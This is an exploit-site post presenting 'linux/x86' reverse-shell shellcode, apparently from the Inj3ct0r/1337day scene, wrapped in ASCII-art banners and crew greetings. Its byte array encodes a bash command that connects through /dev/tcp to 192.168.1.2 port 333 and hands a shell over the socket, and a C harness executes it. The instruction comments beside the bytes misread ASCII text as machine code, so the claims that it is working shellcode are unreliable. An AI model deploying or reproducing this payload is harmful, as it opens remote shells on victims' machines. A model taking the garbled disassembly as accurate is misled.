1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* ### # Title : linux/x86 BackShell-TCP bash[/dev/tcp],execve(/bin/sh),port 333 - 62 bytes # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) kedans@facebook.com # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # Facebook : http://facebook.com/KedAns # Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com # platform : linux/x86 # Type : shellcode - 62 bytes # Security Risk : Critical # Tested on : Linux.(Ubuntu 10.10) ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ## */ #include <stdio.h> #include <string.h> char sc[] = // bash_exec : "\x30\x3c\x26" // xor %esi,%bh "\x37" // aaa ;ARG "\x33\x2d\x3b\x65\x78\x65" // xor %ebp,dword $0x6578653b "\x63\x20" // arpl word %eax,%sp "\x37" // aaa ;ARG "\x33\x3c\x3e" // xor %edi,dword %esi %edi // conf_bash (/dev/tcp/192.168.1.2/333) "\x2f" // das "\x64" // prefix fs "\x65\x76\x2f" // jbe short "\x74\x63" // je short "\x70\x2f" // jo short "\x31\x39" // xor dword %ecx,%edi "\x32\x2e" // xor %ch,%esi "\x31\x36" // xor dword %esi,%esi "\x38\x2e" // cmp %esi,%ch "\x31\x2e" // xor dword %esi,%ebp "\x32\x2f" // xor %ch,%edi "\x33\x33" // xor %esi,dword %ebx "\x33\x3b" // xor %edi,dword %ebx // execve(/bin/sh) after back-connect "\x73\x68" // jnb short "\x20\x3c\x26" // and %esi,%bh "\x37" // aaa ;ARG "\x33\x20" // xor %esp,dword %eax "\x3e" // prefix ds "\x26\x37" // aaa "\x33\x20" // xor %esp,%eax "\x32\x3e" // xor %bh,%esi "\x26\x37" // aaa ;ARG "\x33\x7c\xff\xff" // xor %edi,dword %edi,%edi int main() { int (*dz)() = (int(*)())sc; printf("bytes: %u\n", strlen(sc)); dz(); } /* #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy .. # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * # Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TrOoN # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #================================================================================================*/